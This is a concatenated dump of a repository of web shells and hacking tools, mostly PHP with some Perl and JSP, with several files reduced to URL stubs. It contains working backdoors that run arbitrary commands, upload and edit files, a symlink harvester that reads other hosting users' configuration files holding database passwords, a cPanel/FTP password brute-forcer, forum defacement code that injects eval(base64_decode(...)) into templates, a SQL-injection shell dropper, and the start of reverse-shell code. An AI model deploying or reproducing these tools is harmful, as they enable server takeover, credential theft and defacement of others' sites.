cool toad,cool shavik, Ebin V Thomas,Dinelson Amine ,Mr. Trojan,rad paul,Godzila,mike waals,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,silent hacker,lovetherisk
Suriya Prakash,cyber gladiator,Ashell india,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Prashant Tanwar, VikAs ViKi ,Rakesh, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Bhuppi and rest of TEAM INDISHELL
139 | 140 | --==[[Dedicated to]]==-- 141 |
# SH.Kishan Singh Tanwar and my Ex Teacher Mrs. Ritu Tomer Rathi #
--==[[Interface Desgined By]]==--
Deepika Kaushik
142 | ############################################################################################################################################################# 143 | 144 | 145 | 146 | 147 | '; 148 | 149 | ?> 150 |

Welcome Bhai ji :) .. Configuration file killer welcomes you _/\_
151 |
The button given below generates php.ini file :)

152 |

153 |
The button given below extract usernames for symlink :)

154 |

155 | 156 | open this link in new tab to run PHP.INI"; 164 | echo $link; 165 | 166 | } 167 | 168 | 169 | 170 | ?> 171 | 172 | 173 |
176 |

184 |
185 | 186 | "; 189 | if(isset($_POST['su'])) 190 | { 191 | mkdir('Indishell',0777); 192 | $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; 193 | $g = fopen('Indishell/.htaccess','w'); 194 | fwrite($g,$rr); 195 | $indishell = symlink("/","Indishell/root"); 196 | $rt=" OwN3d"; 197 | echo "Bhai ji .... check link given below for / folder symlink
$rt"; 198 | 199 | $dir=mkdir('INDISHELL',0777); 200 | $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; 201 | $f = fopen('INDISHELL/.htaccess','w'); 202 | 203 | fwrite($f,$r); 204 | $consym="configuration files"; 205 | echo "
The link given below for configuration file symlink...open it, once processing finish
$consym"; 206 | 207 | $usr=explode("\n",$_POST['user']); 208 | $configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php"); 209 | foreach($usr as $uss ) 210 | { 211 | $us=trim($uss); 212 | 213 | foreach($configuration as $c) 214 | { 215 | $rs="/home/".$us."/public_html/".$c; 216 | $r="INDISHELL/".$us.$c; 217 | symlink($rs,$r); 218 | 219 | } 220 | 221 | } 222 | 223 | 224 | } 225 | 226 | 227 | 228 | ?> 229 | -------------------------------------------------------------------------------- /Collection/cpanel.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Aria cPanel cracker version 1.0 - Edited By KingDefacer 6 | 15 | 22 | 36 |

38 |
bio - brute - grab users

"; 39 | if ( $page == 'bio' ){ 40 | print 41 | "

42 |
Please enter your USERNAME and PASSWORD to logon
43 | user
44 | 220 +ok
45 | pass ********
46 | 220 +ok login successful
47 | [ user@alturks.com ]# info

48 | Aria cPanel cracker version : 1.0

49 | Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir bypasser ... more stuff will be included in the next version
50 | Our website , http://alturks.com
51 |
"; 52 | }elseif( $page == 'crack'){ 53 | 54 | @ini_set('memory_limit', 1000000000000); 55 | $connect_timeout=5; 56 | @set_time_limit(0); 57 | $submit = $_REQUEST['submit']; 58 | $users = $_REQUEST['users']; 59 | $pass = $_REQUEST['passwords']; 60 | $target = $_REQUEST['target']; 61 | $option = $_REQUEST['option']; 62 | if($target == ''){ 63 | $target = 'localhost'; 64 | } 65 | print "
66 |


67 |
68 | Target :

69 |

70 | 71 | 72 | 74 | 77 | 78 |
73 | Username 75 |

76 | Password

79 |

80 | 81 |
82 |
83 | Options : cPanel 84 | ftp ==>

85 |

"; 86 | ?> 87 | Error : Connection timed out , make confidence about validation of target !"; 101 | exit;} 102 | 103 | elseif ( curl_errno($ch) == 0 ){ 104 | 105 | print 106 | "[ user@alturks.com ]# 107 | Attacking has been done , found username , $user and password , 108 | $pass
";}curl_close($ch);} 109 | 110 | function cpanel_check($host,$user,$pass,$timeout){ 111 | $ch = curl_init(); 112 | curl_setopt($ch, CURLOPT_URL, "http://$host:2082"); 113 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 114 | curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); 115 | curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); 116 | curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); 117 | curl_setopt($ch, CURLOPT_FAILONERROR, 1); 118 | $data = curl_exec($ch); 119 | if ( curl_errno($ch) == 28 ) { 120 | print " Error : Connection timed out , make confidence about validation of target !"; 121 | exit;} 122 | elseif ( curl_errno($ch) == 0 ){ 123 | 124 | print 125 | "[ user@alturks.com ]# 126 | Attacking has been done , found username , $user and password , 127 | $pass
";}curl_close($ch);} 128 | 129 | if(isset($submit) && !empty($submit)){ 130 | 131 | $userlist = explode ("\n" , $users ); 132 | $passlist = explode ("\n" , $pass ); 133 | print "[ user@alturks.com ]# Attacking ...
"; 134 | foreach ($userlist as $user) { 135 | $_user = trim($user); 136 | foreach ($passlist as $password ) { 137 | $_pass = trim($password); 138 | if($option == "ftp"){ 139 | ftp_check($target,$_user,$_pass,$connect_timeout); 140 | } 141 | if ($option == "cpanel") 142 | { 143 | cpanel_check($target,$_user,$_pass,$connect_timeout); 144 | } 145 | } 146 | } 147 | } 148 | }elseif ( $page == 'users'){ 149 | echo "

"; 150 | echo '

'; 151 | $file = $_POST['file']; 152 | $level=0; 153 | if(!file_exists("file:")) 154 | @mkdir("file:"); 155 | @chdir("file:"); 156 | $level++; 157 | 158 | $hardstyle = @explode("/", $file); 159 | 160 | for($a=0;$a"; 172 | if(FALSE==curl_exec($ch)) 173 | die('Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.'); 174 | echo ' '; 175 | curl_close($ch); 176 | print '
'; 177 | } 178 | ?> 179 | -------------------------------------------------------------------------------- /Collection/cw.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/cw.php -------------------------------------------------------------------------------- /Collection/cybershell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/cybershell.php -------------------------------------------------------------------------------- /Collection/easy-simple-php-webshell.php: -------------------------------------------------------------------------------- 1 | 2 | 3 |

4 | 5 | 6 |
7 | 
 8 | 
14 |
15 | 16 | 17 | -------------------------------------------------------------------------------- /Collection/erne.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/erne.php -------------------------------------------------------------------------------- /Collection/ex0shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/ex0shell.php -------------------------------------------------------------------------------- /Collection/fatal.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/fatal.php -------------------------------------------------------------------------------- /Collection/ftpsearch.php: -------------------------------------------------------------------------------- 1 | "; 3 | echo "Edited By KingDefacer"; 4 | 5 | set_time_limit(0); 6 | ################## 7 | @$passwd=fopen('/etc/passwd','r'); 8 | if (!$passwd) { 9 | echo "[-] Error : coudn't read /etc/passwd"; 10 | exit; 11 | } 12 | $path_to_public=array(); 13 | $users=array(); 14 | $pathtoconf=array(); 15 | $i=0; 16 | 17 | while(!feof($passwd)) { 18 | $str=fgets($passwd); 19 | if ($i>35) { 20 | $pos=strpos($str,":"); 21 | $username=substr($str,0,$pos); 22 | $dirz="/home/$username/public_html/"; 23 | if (($username!="")) { 24 | if (is_readable($dirz)) { 25 | array_push($users,$username); 26 | array_push($path_to_public,$dirz); 27 | } 28 | } 29 | } 30 | $i++; 31 | } 32 | ################### 33 | 34 | ######################### 35 | echo "

"; 36 | echo "
"; 100 | 101 | echo ""; 102 | ?> 103 | -------------------------------------------------------------------------------- /Collection/go-shell.php: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | #change this password; for power security - delete this file =) 4 | $pwd='adm'; 5 | 6 | print "Content-type: text/html\n\n"; 7 | &read_param(); 8 | if (!defined$param{dir}){$param{dir}="/"}; 9 | if (!defined$param{cmd}){$param{cmd}="ls -la"}; 10 | if (!defined$param{pwd}){$param{pwd}='ter'}; 11 | 12 | print << "[kalabanga]"; 13 | 14 | GO.cgi 15 | 38 | 39 | 40 | Current request is: 41 |
42 | [kalabanga] 43 | 44 | print "cd $param{dir}&&$param{cmd}"; 45 | 46 | print << "[kalabanga]"; 47 |
48 | Answer for current request is: 49 | 
50 | [kalabanga]
51 | 
52 | if ($param{pwd} ne $pwd){print "user invalid, please replace user";}
53 | else {
54 | open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
55 | while ($line=){print "$line";};
56 | close (FILEHANDLE);
57 | };
58 | 
59 | print << "[kalabanga]";
60 |
61 |
62 | Password: 63 | 64 | Dir for next request: 65 | 66 | next request: 67 | 68 | 69 | 70 |
71 | 72 | 73 | [kalabanga] 74 | 75 | sub read_param { 76 | $buffer = "$ENV{'QUERY_STRING'}"; 77 | @pairs = split(/&/, $buffer); 78 | foreach $pair (@pairs) 79 | { 80 | ($name, $value) = split(/=/, $pair); 81 | $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; 82 | $value =~ s/\+/ /g; 83 | $value =~ s/%20/ /g; 84 | $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; 85 | $param{$name} = $value; 86 | } 87 | } -------------------------------------------------------------------------------- /Collection/h4ntu_shell.php: -------------------------------------------------------------------------------- 1 | h4ntu shell [powered by tsoi] 2 | This Is The Server Information

"; 4 | ?> 5 | 6 | 16 | 17 |
18 | 19 | 23 | 24 | 25 | 26 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 |
:
User Info: uid=() euid=() gid=()
Current Path:
Permission Directory:
Server Services:
Server Adress:
Script Current User:
PHP Version:
55 |
56 | 57 | #php injection:
58 |
"> 59 | cmd : 60 | 61 |
62 | 63 |
64 | 65 |
66 | 67 | 
68 |  /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
73 |   $output = ob_get_contents();
74 |   ob_end_clean();
75 |   if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
76 | exit;
77 | ?>
78 |
79 | -------------------------------------------------------------------------------- /Collection/hiddens_shell.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Collection/jspshell.jsp: -------------------------------------------------------------------------------- 1 | <%@ page 2 | import="java.util.*,java.io.*"%> 3 | <% 4 | %> 5 | 6 | 7 |

JSP SHELL

8 |
10 | 11 | 12 |
13 | 
14 | <%
15 | if (request.getParameter("cmd") != null) {
16 | out.println("Command: " +
17 | request.getParameter("cmd") + "
");
18 | Process p =
19 | Runtime.getRuntime().exec(request.getParameter("cmd"));
20 | OutputStream os = p.getOutputStream();
21 | InputStream in = p.getInputStream();
22 | DataInputStream dis = new DataInputStream(in);
23 | String disr = dis.readLine();
24 | while ( disr != null ) {
25 | out.println(disr);
26 | disr = dis.readLine();
27 | }
28 | }
29 | %>
30 |
31 | 32 | 33 | -------------------------------------------------------------------------------- /Collection/kral.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/kral.php -------------------------------------------------------------------------------- /Collection/lamashell.php: -------------------------------------------------------------------------------- 1 | 18 | 20 | 21 | 22 | lama's'hell v. 3.0 23 | 30 | 31 | 32 | 
33 |                               _           _
34 |                              / \_______ /|_\
35 |                             /          /_/ \__
36 |                            /             \_/ /
37 |                          _|_              |/|_
38 |                          _|_  O    _    O  _|_
39 |                          _|_      (_)      _|_
40 |                           \                 /
41 |                            _\_____________/_
42 |                           /  \/  (___)  \/  \
43 |                           \__(  o     o  )__/ 
58 |
59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 |
Execute command:
Change directory:
Upload file:
67 | 

68 | 
";
72 |     } else {
73 |         echo "There was an error uploading the file, please try again!";
74 |     }
75 |     }
76 |     if(($_POST['exe']) == "Execute") {
77 |      $curcmd = "cd ".$curdir.";".$curcmd;
78 |      $f=popen($curcmd,"r");
79 |      while (!feof($f)) {
80 |       $buffer = fgets($f, 4096);
81 |       $string .= $buffer;
82 |      }
83 |      pclose($f);
84 |      echo htmlspecialchars($string);
85 |     }
86 | ?>
87 |
88 | 89 | 90 | -------------------------------------------------------------------------------- /Collection/load_shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/load_shell.php -------------------------------------------------------------------------------- /Collection/lolipop.php: -------------------------------------------------------------------------------- 1 |

2 | ON"; 52 | } 53 | else 54 | { 55 | $c_h = "OFF"; 56 | } 57 | 58 | //Kapali Fonksiyonlar 59 | if (''==($disfunc)) 60 | { 61 | $dis = "None"; 62 | } 63 | else 64 | { 65 | $dis = "$disfunc"; 66 | } 67 | //Dizin degisimi 68 | if(isset($_GET['dir']) && is_dir($_GET['dir'])) 69 | { 70 | chdir($_GET['dir']); 71 | } 72 | 73 | $ccc = realpath($_GET['chdir'])."/"; 74 | 75 | //Baslik 76 | echo " 77 | 102 | 103 | Lolipop.php - Edited By KingDefacer - [$site]"; 104 | //Ana tablo 105 | echo " 106 | 107 | 108 | 114 | 115 | 117 | 118 |
109 | 110 | 111 | Lolipop BETA ( Powered By KingDefacer ) 112 | 113 |
116 | Site: $site
Server name: $sname
Software: $info
Version : $version
Uname -a: $uname
Path: $ccc
Safemode: $c_h
Disable Functions: $dis
Page: $page
Your IP: $yourip
Server IP: $serverip
"; 119 | echo ' 120 | '; 121 | //Buton Listesi 122 | echo "
"; 123 | 124 | 125 | 126 | 127 | //VB HACK 128 | if (isset($_POST['vbulletin'])) 129 | { 130 | echo "
131 |
132 |
==Lolipop VB index.==
133 |
Mysql Host

134 | DbKullanici

135 | Dbadi

136 | 137 | Dbsifre

138 | ?ndexin Yaz?lacag? B?l?m

139 |
"; 140 | die(); 141 | } 142 | $KingDefacer="Powered By Lolipop :))"; 143 | $dbh = $_POST['dbh']; 144 | $dbu = $_POST['dbu']; 145 | $dbn = $_POST['dbn']; 146 | $dbp = $_POST['dbp']; 147 | $index = $_POST['index']; 148 | $index=str_replace("\'","'",$index); 149 | $set_index = "{\${eval(base64_decode(\'"; 150 | 151 | $set_index .= base64_encode("echo \"$index\";"); 152 | 153 | 154 | $set_index .= "\'))}}{\${exit()}}"; 155 | 156 | 157 | if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) 158 | { 159 | mysql_connect($dbh,$dbu,$dbp) or die(mysql_error()); 160 | mysql_select_db($dbn) or die(mysql_error()); 161 | $loli1 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='spacer_open'"; 162 | $loli2 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='FORUMHOME'"; 163 | $loli3 = "UPDATE style SET css='".$set_index."".$KingDefacer."', stylevars='', csscolors='', editorstyles=''"; 164 | $result = mysql_query($loli1) or die (mysql_error()); 165 | $result = mysql_query($loli2) or die (mysql_error()); 166 | $result = mysql_query($loli3) or die (mysql_error()); 167 | echo ""; 168 | } 169 | 170 | //MyBB Hack 171 | if (isset($_POST['mybulletin'])) 172 | { 173 | echo "
174 |
175 |
==Lolipop MyBB index.==
176 |
Mysql Host

177 | DbKullanici

178 | Dbadi

179 | Dbsifre

180 | ?ndexin Yaz?lacag? B?l?m

181 |
"; 182 | die(); 183 | } 184 | $mybb_dbh = $_POST['mybbdbh']; 185 | $mybb_dbu = $_POST['mybbdbu']; 186 | $mybb_dbn = $_POST['mybbdbn']; 187 | $mybb_dbp = $_POST['mybbdbp']; 188 | $mybb_index = $_POST['mybbindex']; 189 | 190 | if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index)) 191 | { 192 | mysql_connect($mybb_dbh,$mybb_dbu,$mybb_dbp) or die(mysql_error()); 193 | mysql_select_db($mybb_dbn) or die(mysql_error()); 194 | $prefix="mybb_"; 195 | $loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'"; 196 | 197 | $result = mysql_query($loli7) or die (mysql_error()); 198 | 199 | echo ""; 200 | } 201 | //PhpBB 202 | if (isset($_POST['phpbb'])) 203 | { 204 | echo "
205 |
206 |
==Lolipop PHPBB index.==
207 |
Mysql Host

208 | DbKullanici

209 | Dbadi

210 | Dbsifre

211 | Yazi Veya KOD

212 | Degisecek KATEGORI ID si

213 |
"; 214 | die(); 215 | } 216 | $phpbb_dbh = $_POST['phpbbdbh']; 217 | $phpbb_dbu = $_POST['phpbbdbu']; 218 | $phpbb_dbn = $_POST['phpbbdbn']; 219 | $phpbb_dbp = $_POST['phpbbdbp']; 220 | $phpbb_kat = $_POST['phpbbkat']; 221 | $kategoriid=$_POST['katid']; 222 | 223 | if (!empty($phpbb_dbh) && !empty($phpbb_dbu) && !empty($phpbb_dbn) && !empty($phpbb_kat)) 224 | { 225 | mysql_connect($phpbb_dbh,$phpbb_dbu,$phpbb_dbp) or die(mysql_error()); 226 | mysql_select_db($phpbb_dbn) or die(mysql_error()); 227 | 228 | 229 | $loli10 = "UPDATE phpbb_categories SET cat_title='".$phpbb_kat."' WHERE cat_id='".$kategoriid."'"; 230 | 231 | $result = mysql_query($loli10) or die (mysql_error()); 232 | 233 | echo ""; 234 | } 235 | //SmfHACK 236 | if (isset($_POST['smf'])) 237 | { 238 | echo "
239 |
240 |
==Lolipop SMF Index.==
241 |
Mysql Host

242 | DbKullanici

243 | Dbadi

244 | Dbsifre

245 | Yazi Yada KOD

246 | Degisecek KATEGORI ID si

247 | 248 |
"; 249 | die(); 250 | } 251 | $smf_dbh = $_POST['smfdbh']; 252 | $smf_dbu = $_POST['smfdbu']; 253 | $smf_dbn = $_POST['smfdbn']; 254 | $smf_dbp = $_POST['smfdbp']; 255 | $smf_index = $_POST['smf_index']; 256 | $smf_katid=$_POST['katid']; 257 | 258 | if (!empty($smf_dbh) && !empty($smf_dbu) && !empty($smf_dbn) && !empty($smf_index)) 259 | { 260 | mysql_connect($smf_dbh,$smf_dbu,$smf_dbp) or die(mysql_error()); 261 | mysql_select_db($smf_dbn) or die(mysql_error()); 262 | $prefix="smf_"; 263 | $loli12 = "UPDATE ".$prefix."categories SET name='".$smf_index."' WHERE ID_CAT='".$smf_katid."'"; 264 | 265 | $result = mysql_query($loli12) or die (mysql_error()); 266 | 267 | echo ""; 268 | } 269 | 270 | 271 | //Alt taraf 272 | echo " 273 | 274 | 275 |
276 | 277 | 283 |
278 | 279 |

Lolipop.php

280 |

Edited By KingDefacer

281 |


282 |

"; 284 | 285 | 286 | 287 | // Kod bitisi 288 | ?> 289 | -------------------------------------------------------------------------------- /Collection/matamu.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | 9 | Matamu Mat 10 | 11 | 12 |

13 | 14 | 56 | 57 |
58 |

Current working directory: 59 | Root/'; 64 | 65 | if (!empty($work_dir_splitted[0])) { 66 | $path = ''; 67 | for ($i = 0; $i < count($work_dir_splitted); $i++) { 68 | $path .= '/' . $work_dir_splitted[$i]; 69 | printf('%s/', 70 | $PHP_SELF, urlencode($path), $work_dir_splitted[$i]); 71 | } 72 | } 73 | 74 | ?>

75 |

Choose new working directory: 76 |

115 | 116 |

Command: 117 |

118 | 119 |

Enable stderr-trapping?

120 | 137 |
138 | 139 | 142 | 143 |
144 | 145 | 146 | 147 | -------------------------------------------------------------------------------- /Collection/mini.php: -------------------------------------------------------------------------------- 1 | $value){ 7 | $_POST[$key] = stripslashes($value); 8 | } 9 | } 10 | echo ' 11 | 12 | 13 | 14 | Mini Shell 15 | 53 | 54 | 55 |

56 | Mini Shell 57 |

58 | 59 | '; 98 | if(isset($_GET['filesrc'])){ 99 | echo "
Direktori : '; 60 | if(isset($_GET['path'])){ 61 | $path = $_GET['path']; 62 | }else{ 63 | $path = getcwd(); 64 | } 65 | 66 | $path = str_replace('\\','/',$path); 67 | $paths = explode('/',$path); 68 | 69 | foreach($paths as $id=>$pat){ 70 | if($pat == '' && $id == 0){ 71 | $a = true; 72 | echo '/'; 73 | continue; 74 | } 75 | if($pat == '') continue; 76 | echo ''.$pat.'/'; 82 | } 83 | echo '
'; 84 | if(isset($_FILES['file'])){ 85 | if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ 86 | 87 | echo 'File Ter-Upload :*
'; 88 | }else{ 89 | echo 'Upload gagal, Servernya kek 90 |
'; 91 | } 92 | } 93 | echo '
94 | Upload File : 95 | 96 |
97 |
Current File : "; 100 | echo $_GET['filesrc']; 101 | echo '

'; 102 | echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
'); 103 | }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ 104 | echo '
'.$_POST['path'].'

'; 105 | if($_POST['opt'] == 'chmod'){ 106 | if(isset($_POST['perm'])){ 107 | if(chmod($_POST['path'],$_POST['perm'])){ 108 | echo 'Change Permission Done.
'; 109 | }else{ 110 | echo 'Change Permission Error.
'; 111 | } 112 | } 113 | echo '
114 | Permission : 115 | 116 | 117 | 118 |
'; 119 | }elseif($_POST['opt'] == 'rename'){ 120 | if(isset($_POST['newname'])){ 121 | if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ 122 | echo 'Change Name Done.
'; 123 | }else{ 124 | echo 'Change Name Error.
'; 125 | } 126 | $_POST['name'] = $_POST['newname']; 127 | } 128 | echo '
129 | New Name : 130 | 131 | 132 | 133 |
'; 134 | }elseif($_POST['opt'] == 'edit'){ 135 | if(isset($_POST['src'])){ 136 | $fp = fopen($_POST['path'],'w'); 137 | if(fwrite($fp,$_POST['src'])){ 138 | echo 'Edit File Done ~_^.
'; 139 | }else{ 140 | echo 'Edit File Error ~_~.
'; 141 | } 142 | fclose($fp); 143 | } 144 | echo '
145 |
146 | 147 | 148 | 149 |
'; 150 | } 151 | echo '
'; 152 | }else{ 153 | echo '
'; 154 | if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ 155 | if($_POST['type'] == 'dir'){ 156 | if(rmdir($_POST['path'])){ 157 | echo 'Delete Dir Done.
'; 158 | }else{ 159 | echo 'Delete Dir Error.
'; 160 | } 161 | }elseif($_POST['type'] == 'file'){ 162 | if(unlink($_POST['path'])){ 163 | echo 'Delete File Done.
'; 164 | }else{ 165 | echo 'Delete File Error.
'; 166 | } 167 | } 168 | } 169 | echo '
'; 170 | $scandir = scandir($path); 171 | echo '
172 | 173 | 174 | 175 | 176 | 177 | '; 178 | 179 | foreach($scandir as $dir){ 180 | if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; 181 | echo " 182 | 183 | 184 | 191 | 203 | "; 204 | } 205 | echo ''; 206 | foreach($scandir as $file){ 207 | if(!is_file("$path/$file")) continue; 208 | $size = filesize("$path/$file")/1024; 209 | $size = round($size,3); 210 | if($size >= 1024){ 211 | $size = round($size/1024,2).' MB'; 212 | }else{ 213 | $size = $size.' KB'; 214 | 215 | } 216 | 217 | echo " 218 | 219 | 220 | 226 | 239 | "; 240 | } 241 | echo '
Name
Size
Permissions
Options
$dir
--
"; 185 | if(is_writable("$path/$dir")) echo ''; 186 | elseif(!is_readable("$path/$dir")) echo ''; 187 | echo perms("$path/$dir"); 188 | if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; 189 | 190 | echo "
192 | 198 | 199 | 200 | 201 | \" /> 202 |
$file
".$size."
"; 221 | if(is_writable("$path/$file")) echo ''; 222 | elseif(!is_readable("$path/$file")) echo ''; 223 | echo perms("$path/$file"); 224 | if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; 225 | echo "
227 | 234 | 235 | 236 | 237 | \" /> 238 |
242 |
'; 243 | } 244 | echo '

Zerion Mini Shell 1.0
245 | 246 | '; 247 | function perms($file){ 248 | $perms = fileperms($file); 249 | 250 | if (($perms & 0xC000) == 0xC000) { 251 | 252 | // Socket 253 | $info = 's'; 254 | } elseif (($perms & 0xA000) == 0xA000) { 255 | // Symbolic Link 256 | $info = 'l'; 257 | } elseif (($perms & 0x8000) == 0x8000) { 258 | // Regular 259 | $info = '-'; 260 | } elseif (($perms & 0x6000) == 0x6000) { 261 | // Block special 262 | $info = 'b'; 263 | } elseif (($perms & 0x4000) == 0x4000) { 264 | // Directory 265 | $info = 'd'; 266 | } elseif (($perms & 0x2000) == 0x2000) { 267 | // Character special 268 | $info = 'c'; 269 | } elseif (($perms & 0x1000) == 0x1000) { 270 | // FIFO pipe 271 | $info = 'p'; 272 | } else { 273 | // Unknown 274 | $info = 'u'; 275 | } 276 | 277 | // Owner 278 | $info .= (($perms & 0x0100) ? 'r' : '-'); 279 | $info .= (($perms & 0x0080) ? 'w' : '-'); 280 | $info .= (($perms & 0x0040) ? 281 | (($perms & 0x0800) ? 's' : 'x' ) : 282 | (($perms & 0x0800) ? 'S' : '-')); 283 | 284 | 285 | // Group 286 | $info .= (($perms & 0x0020) ? 'r' : '-'); 287 | $info .= (($perms & 0x0010) ? 'w' : '-'); 288 | $info .= (($perms & 0x0008) ? 289 | (($perms & 0x0400) ? 's' : 'x' ) : 290 | (($perms & 0x0400) ? 'S' : '-')); 291 | 292 | // World 293 | $info .= (($perms & 0x0004) ? 'r' : '-'); 294 | $info .= (($perms & 0x0002) ? 'w' : '-'); 295 | 296 | $info .= (($perms & 0x0001) ? 297 | (($perms & 0x0200) ? 't' : 'x' ) : 298 | (($perms & 0x0200) ? 'T' : '-')); 299 | 300 | return $info; 301 | } 302 | ?> 303 | -------------------------------------------------------------------------------- /Collection/nshell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JohnTroony/php-webshells/226a15d0684e2f893caed0b94fbbf0037b89adea/Collection/nshell.php -------------------------------------------------------------------------------- /Collection/pHpINJ.php: -------------------------------------------------------------------------------- 1 | 3 | 4 | 5 | || .::News Remote PHP Shell Injection::. || 6 | 7 | 8 |
|| .::News PHP Shell Injection::. ||


9 | ' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile"; 15 | $sql = urlencode($sql); 16 | $expurl= $url."?id=".$sql ; 17 | echo ' Click Here to Exploit
'; 18 | echo "After clicking go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results"; 19 | } 20 | else 21 | { 22 | ?> 23 | Url to index.php:
24 |
" method = "post"> 25 |
26 | Server Path to Shell:
27 | Full server path to a writable file which will contain the Php Shell
28 |

29 |

30 | 31 | 32 | 33 | 36 | 37 | -------------------------------------------------------------------------------- /Collection/php-backdoor.php: -------------------------------------------------------------------------------- 1 | "; 14 | if ($handle = opendir("$d")) { 15 | echo "

listing of $d

"; 16 | while ($dir = readdir($handle)){ 17 | if (is_dir("$d/$dir")) echo ""; 18 | else echo ""; 19 | echo "$dir\n"; 20 | echo ""; 21 | } 22 | 23 | } else echo "opendir() failed"; 24 | closedir($handle); 25 | die ("
"); 26 | } 27 | if(isset($_REQUEST['c'])){ 28 | echo "
";
29 | 	system($_REQUEST['c']);		   
30 | 	die;
31 | }
32 | if(isset($_REQUEST['upload'])){
33 | 
34 | 		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
35 | 			else $dir=$_REQUEST['dir'];
36 | 		$fname=$HTTP_POST_FILES['file_name']['name'];
37 | 		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
38 | 			die('file uploading error.');
39 | }
40 | if(isset($_REQUEST['mquery'])){
41 | 	
42 | 	$host=$_REQUEST['host'];
43 | 	$usr=$_REQUEST['usr'];
44 | 	$passwd=$_REQUEST['passwd'];
45 | 	$db=$_REQUEST['db'];
46 | 	$mquery=$_REQUEST['mquery'];
47 | 	mysql_connect("$host", "$usr", "$passwd") or
48 |     die("Could not connect: " . mysql_error());
49 |     mysql_select_db("$db");
50 |     $result = mysql_query("$mquery");
51 | 	if($result!=FALSE) echo "
query was executed correctly
\n";
52 |     while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
53 |     mysql_free_result($result);
54 | 	die;
55 | }
56 | ?>
57 | 
execute command: 
 
58 | 

59 | upload file:   to dir:   

60 | 
to browse go to http://?d=[directory here]
61 | 
for example:
62 | http://?d=/etc on *nix
63 | or http://?d=c:/windows on win
64 | 
execute mysql query:
65 | 

66 | host:  user:  password: 
67 | 
68 | database:   query:  
69 | 

70 | 
71 | 
72 | 


--------------------------------------------------------------------------------
/Collection/php-findsock-shell.php:
--------------------------------------------------------------------------------
 1 | 
89 | 
90 | 


--------------------------------------------------------------------------------
/Collection/php-reverse-shell.php:
--------------------------------------------------------------------------------
  1 |  array("pipe", "r"),  // stdin is a pipe that the child will read from
109 |    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
